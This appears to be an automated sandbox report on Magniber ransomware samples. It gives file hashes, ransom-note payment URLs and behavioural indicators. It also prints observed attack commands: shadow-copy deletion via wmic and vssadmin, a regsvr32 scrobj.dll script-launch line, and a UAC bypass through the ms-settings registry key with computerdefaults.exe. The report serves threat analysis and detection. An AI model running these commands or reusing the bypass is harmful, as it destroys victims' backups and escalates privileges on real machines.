Overview
overview
10Static
static
81814a6a674...67.exe
windows7_x64
31814a6a674...67.exe
windows10_x64
102ca4f97e15...51.exe
windows7_x64
102ca4f97e15...51.exe
windows10_x64
103db6e8df73...3b.dll
windows7_x64
103db6e8df73...3b.dll
windows10_x64
103e2ce6fd7b...a5.exe
windows7_x64
103e2ce6fd7b...a5.exe
windows10_x64
10463b34821a...40.exe
windows7_x64
10463b34821a...40.exe
windows10_x64
34f4a33f700...72.exe
windows7_x64
104f4a33f700...72.exe
windows10_x64
853b1c1b2f4...22.exe
windows7_x64
1053b1c1b2f4...22.exe
windows10_x64
1062b2822215...d3.exe
windows7_x64
962b2822215...d3.exe
windows10_x64
96bc6f60b87...bc.dll
windows7_x64
106bc6f60b87...bc.dll
windows10_x64
106f7043b24d...1d.dll
windows7_x64
16f7043b24d...1d.dll
windows10_x64
3706a8a4fc4...1c.exe
windows7_x64
10706a8a4fc4...1c.exe
windows10_x64
107236c8098c...8e.exe
windows7_x64
107236c8098c...8e.exe
windows10_x64
1074ebfcd116...dd.dll
windows7_x64
1074ebfcd116...dd.dll
windows10_x64
107fbeac1dca...de.exe
windows7_x64
107fbeac1dca...de.exe
windows10_x64
1087e6f7b20e...89.exe
windows7_x64
387e6f7b20e...89.exe
windows10_x64
3918127c59e...3d.exe
windows7_x64
10918127c59e...3d.exe
windows10_x64
10Analysis
-
max time kernel
154s -
max time network
86s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
24-09-2021 10:27
Behavioral task
behavioral1
Sample
1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Resource
win10v20210408
Behavioral task
behavioral3
Sample
2ca4f97e15c6ddaa3276fbc56e716249dde1d2607f3b745933fedd9df3879751.exe
Resource
win7-en-20210920
Behavioral task
behavioral4
Sample
2ca4f97e15c6ddaa3276fbc56e716249dde1d2607f3b745933fedd9df3879751.exe
Resource
win10v20210408
Behavioral task
behavioral5
Sample
3db6e8df73f12b6a9fa9adb6ad87b017d530a9d736909338042735ed00a9463b.dll
Resource
win7-en-20210920
Behavioral task
behavioral6
Sample
3db6e8df73f12b6a9fa9adb6ad87b017d530a9d736909338042735ed00a9463b.dll
Resource
win10v20210408
Behavioral task
behavioral7
Sample
3e2ce6fd7b53224df92581b800ce9a6605eae878d4165df9ae8f73a488be3fa5.exe
Resource
win7-en-20210920
Behavioral task
behavioral8
Sample
3e2ce6fd7b53224df92581b800ce9a6605eae878d4165df9ae8f73a488be3fa5.exe
Resource
win10v20210408
Behavioral task
behavioral9
Sample
463b34821a8eb219ff5980787d95bc2cfdd2d7f82720163394973814cd5dfe40.exe
Resource
win7-en-20210920
Behavioral task
behavioral10
Sample
463b34821a8eb219ff5980787d95bc2cfdd2d7f82720163394973814cd5dfe40.exe
Resource
win10-en-20210920
Behavioral task
behavioral11
Sample
4f4a33f70099855f5f503716515f388da3a5daa1e2fac59ec6c881e89ef7d072.exe
Resource
win7v20210408
Behavioral task
behavioral12
Sample
4f4a33f70099855f5f503716515f388da3a5daa1e2fac59ec6c881e89ef7d072.exe
Resource
win10-en-20210920
Behavioral task
behavioral13
Sample
53b1c1b2f41a7fc300e97d036e57539453ff82001dd3f6abf07f4896b1f9ca22.exe
Resource
win7v20210408
Behavioral task
behavioral14
Sample
53b1c1b2f41a7fc300e97d036e57539453ff82001dd3f6abf07f4896b1f9ca22.exe
Resource
win10-en-20210920
Behavioral task
behavioral15
Sample
62b28222159f1b1abe80bec49c89444448c41623a93895afafb7563fe82ffdd3.exe
Resource
win7-en-20210920
Behavioral task
behavioral16
Sample
62b28222159f1b1abe80bec49c89444448c41623a93895afafb7563fe82ffdd3.exe
Resource
win10v20210408
Behavioral task
behavioral17
Sample
6bc6f60b873ea406022459edcd2df278cb2ec7bb4d994ebd4fc02af3a57ec6bc.dll
Resource
win7-en-20210920
Behavioral task
behavioral18
Sample
6bc6f60b873ea406022459edcd2df278cb2ec7bb4d994ebd4fc02af3a57ec6bc.dll
Resource
win10v20210408
Behavioral task
behavioral19
Sample
6f7043b24d9b4c30006781402f0cef2543c8f3e9087d79f6bcff43b1418ad21d.dll
Resource
win7-en-20210920
Behavioral task
behavioral20
Sample
6f7043b24d9b4c30006781402f0cef2543c8f3e9087d79f6bcff43b1418ad21d.dll
Resource
win10v20210408
Behavioral task
behavioral21
Sample
706a8a4fc4b9f8b15c6bf1ee0fe732eaa5e069615ea126b931166672a8a5b51c.exe
Resource
win7-en-20210920
Behavioral task
behavioral22
Sample
706a8a4fc4b9f8b15c6bf1ee0fe732eaa5e069615ea126b931166672a8a5b51c.exe
Resource
win10v20210408
Behavioral task
behavioral23
Sample
7236c8098c55ea1d144f4d6646e8cab8c7fdbde1d127d409b0d6a4ff1029628e.exe
Resource
win7-en-20210920
Behavioral task
behavioral24
Sample
7236c8098c55ea1d144f4d6646e8cab8c7fdbde1d127d409b0d6a4ff1029628e.exe
Resource
win10-en-20210920
Behavioral task
behavioral25
Sample
74ebfcd116fdd39217935d11ae62e48a0c44dfab822edea62ac7f611aca969dd.dll
Resource
win7v20210408
Behavioral task
behavioral26
Sample
74ebfcd116fdd39217935d11ae62e48a0c44dfab822edea62ac7f611aca969dd.dll
Resource
win10-en-20210920
Behavioral task
behavioral27
Sample
7fbeac1dca907f4c04fec45a1228c9277f03930355eeac30d101bbce7e2733de.exe
Resource
win7v20210408
Behavioral task
behavioral28
Sample
7fbeac1dca907f4c04fec45a1228c9277f03930355eeac30d101bbce7e2733de.exe
Resource
win10-en-20210920
Behavioral task
behavioral29
Sample
87e6f7b20ea2bd35d947d9100fe6291dfe186cfedea5d451be14bab5d2518e89.exe
Resource
win7-en-20210920
Behavioral task
behavioral30
Sample
87e6f7b20ea2bd35d947d9100fe6291dfe186cfedea5d451be14bab5d2518e89.exe
Resource
win10v20210408
Behavioral task
behavioral31
Sample
918127c59ea7d9c0095a0add9bc93739a393d9fd64132446e7997952db07f93d.exe
Resource
win7-en-20210920
Behavioral task
behavioral32
Sample
918127c59ea7d9c0095a0add9bc93739a393d9fd64132446e7997952db07f93d.exe
Resource
win10v20210408
General
-
Target
1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
-
Size
22KB
-
MD5
7906dc475a8ae55ffb5af7fd3ac8f10a
-
SHA1
e7304e2436dc0eddddba229f1ec7145055030151
-
SHA256
1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367
-
SHA512
c087b3107295095e9aca527d02b74c067e96ca5daf5457e465f8606dbf4809027faedf65d77868f6fb8bb91a1438e3d0169e59efddf1439bbd3adb3e23a739a1
Malware Config
Extracted
C:\Users\Admin\Desktop\readme.txt
magniber
http://30b89af86aec44d00celtalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj
http://30b89af86aec44d00celtalkfzj.jobsbig.cam/eltalkfzj
http://30b89af86aec44d00celtalkfzj.boxgas.icu/eltalkfzj
http://30b89af86aec44d00celtalkfzj.sixsees.club/eltalkfzj
http://30b89af86aec44d00celtalkfzj.nowuser.casa/eltalkfzj
Signatures
-
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Process spawned unexpected child process 14 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4740 3564 cmd.exe 14 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4788 3564 cmd.exe 14 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4780 3564 cmd.exe 14 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4772 3564 cmd.exe 14 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4764 3564 cmd.exe 14 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4756 3564 cmd.exe 14 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4748 3564 cmd.exe 14 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4732 3564 cmd.exe 14 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4724 3564 cmd.exe 14 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4716 3564 cmd.exe 14 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4708 3564 cmd.exe 14 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4700 3564 cmd.exe 14 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4692 3564 cmd.exe 14 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4684 3564 cmd.exe 14 -
Modifies extensions of user files 5 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\UnprotectResume.crw => C:\Users\Admin\Pictures\UnprotectResume.crw.eltalkfzj sihost.exe File renamed C:\Users\Admin\Pictures\UseUnregister.crw => C:\Users\Admin\Pictures\UseUnregister.crw.eltalkfzj sihost.exe File renamed C:\Users\Admin\Pictures\StopImport.png => C:\Users\Admin\Pictures\StopImport.png.eltalkfzj sihost.exe File opened for modification C:\Users\Admin\Pictures\UpdateRestore.tiff sihost.exe File renamed C:\Users\Admin\Pictures\UpdateRestore.tiff => C:\Users\Admin\Pictures\UpdateRestore.tiff.eltalkfzj sihost.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 992 set thread context of 2308 992 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 31 PID 992 set thread context of 2316 992 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 30 PID 992 set thread context of 2492 992 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 25 PID 992 set thread context of 3020 992 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 10 PID 992 set thread context of 3500 992 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 18 PID 992 set thread context of 3812 992 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 16 -
Program crash 1 IoCs
pid pid_target Process procid_target 1572 3812 WerFault.exe 16 -
Modifies registry class 29 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell sihost.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" taskhostw.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings sihost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" sihost.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command svchost.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" svchost.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command taskhostw.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" taskhostw.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" sihost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" sihost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command sihost.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open sihost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" taskhostw.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 1792 notepad.exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process 992 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 992 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 1572 WerFault.exe 1572 WerFault.exe 1572 WerFault.exe 1572 WerFault.exe 1572 WerFault.exe 1572 WerFault.exe 1572 WerFault.exe 1572 WerFault.exe 1572 WerFault.exe 1572 WerFault.exe 1572 WerFault.exe 1572 WerFault.exe 1572 WerFault.exe 1572 WerFault.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3020 Explorer.EXE -
Suspicious behavior: MapViewOfSection 6 IoCs
pid Process 992 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 992 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 992 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 992 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 992 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 992 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeDebugPrivilege 1572 WerFault.exe Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeIncreaseQuotaPrivilege 4036 WMIC.exe Token: SeSecurityPrivilege 4036 WMIC.exe Token: SeTakeOwnershipPrivilege 4036 WMIC.exe Token: SeLoadDriverPrivilege 4036 WMIC.exe Token: SeSystemProfilePrivilege 4036 WMIC.exe Token: SeSystemtimePrivilege 4036 WMIC.exe Token: SeProfSingleProcessPrivilege 4036 WMIC.exe -
Suspicious use of FindShellTrayWindow 8 IoCs
pid Process 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3020 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2308 wrote to memory of 1792 2308 sihost.exe 70 PID 2308 wrote to memory of 1792 2308 sihost.exe 70 PID 2308 wrote to memory of 2472 2308 sihost.exe 72 PID 2308 wrote to memory of 2472 2308 sihost.exe 72 PID 2308 wrote to memory of 2672 2308 sihost.exe 75 PID 2308 wrote to memory of 2672 2308 sihost.exe 75 PID 2308 wrote to memory of 2768 2308 sihost.exe 73 PID 2308 wrote to memory of 2768 2308 sihost.exe 73 PID 2316 wrote to memory of 492 2316 svchost.exe 78 PID 2316 wrote to memory of 492 2316 svchost.exe 78 PID 2316 wrote to memory of 3988 2316 svchost.exe 79 PID 2316 wrote to memory of 3988 2316 svchost.exe 79 PID 3020 wrote to memory of 3700 3020 Explorer.EXE 82 PID 3020 wrote to memory of 3700 3020 Explorer.EXE 82 PID 3020 wrote to memory of 3000 3020 Explorer.EXE 83 PID 3020 wrote to memory of 3000 3020 Explorer.EXE 83 PID 2768 wrote to memory of 4036 2768 cmd.exe 86 PID 2768 wrote to memory of 4036 2768 cmd.exe 86 PID 2672 wrote to memory of 4088 2672 cmd.exe 87 PID 2672 wrote to memory of 4088 2672 cmd.exe 87 PID 2492 wrote to memory of 3676 2492 taskhostw.exe 88 PID 2492 wrote to memory of 3676 2492 taskhostw.exe 88 PID 2492 wrote to memory of 2240 2492 taskhostw.exe 91 PID 2492 wrote to memory of 2240 2492 taskhostw.exe 91 PID 3000 wrote to memory of 736 3000 cmd.exe 92 PID 3000 wrote to memory of 736 3000 cmd.exe 92 PID 3988 wrote to memory of 3472 3988 cmd.exe 93 PID 3988 wrote to memory of 3472 3988 cmd.exe 93 PID 492 wrote to memory of 636 492 cmd.exe 95 PID 492 wrote to memory of 636 492 cmd.exe 95 PID 3500 wrote to memory of 416 3500 RuntimeBroker.exe 94 PID 3500 wrote to memory of 416 3500 RuntimeBroker.exe 94 PID 3500 wrote to memory of 1160 3500 RuntimeBroker.exe 96 PID 3500 wrote to memory of 1160 3500 RuntimeBroker.exe 96 PID 3700 wrote to memory of 3808 3700 cmd.exe 99 PID 3700 wrote to memory of 3808 3700 cmd.exe 99 PID 2240 wrote to memory of 2468 2240 cmd.exe 101 PID 2240 wrote to memory of 2468 2240 cmd.exe 101 PID 992 wrote to memory of 2676 992 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 100 PID 992 wrote to memory of 2676 992 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 100 PID 992 wrote to memory of 3528 992 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 104 PID 992 wrote to memory of 3528 992 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 104 PID 3676 wrote to memory of 664 3676 cmd.exe 105 PID 3676 wrote to memory of 664 3676 cmd.exe 105 PID 1160 wrote to memory of 1144 1160 cmd.exe 106 PID 1160 wrote to memory of 1144 1160 cmd.exe 106 PID 992 wrote to memory of 3928 992 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 107 PID 992 wrote to memory of 3928 992 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 107 PID 992 wrote to memory of 4104 992 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 108 PID 992 wrote to memory of 4104 992 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 108 PID 3528 wrote to memory of 4244 3528 cmd.exe 112 PID 3528 wrote to memory of 4244 3528 cmd.exe 112 PID 2676 wrote to memory of 4268 2676 cmd.exe 113 PID 2676 wrote to memory of 4268 2676 cmd.exe 113 PID 4104 wrote to memory of 4292 4104 cmd.exe 114 PID 4104 wrote to memory of 4292 4104 cmd.exe 114 PID 3928 wrote to memory of 4304 3928 cmd.exe 115 PID 3928 wrote to memory of 4304 3928 cmd.exe 115 PID 4684 wrote to memory of 5108 4684 cmd.exe 147 PID 4684 wrote to memory of 5108 4684 cmd.exe 147 PID 4700 wrote to memory of 4468 4700 cmd.exe 144 PID 4700 wrote to memory of 4468 4700 cmd.exe 144 PID 4692 wrote to memory of 4412 4692 cmd.exe 146 PID 4692 wrote to memory of 4412 4692 cmd.exe 146
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe"C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe"2⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:992 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"4⤵PID:4268
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:3528 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"4⤵PID:4244
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:3928 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"4⤵PID:4304
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"4⤵PID:4292
-
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:3700 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:3808
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:736
-
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3812
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3812 -s 8402⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1572
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3500 -
C:\Windows\System32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵PID:416
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:4176
-
-
-
C:\Windows\System32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1160 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:1144
-
-
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2492 -
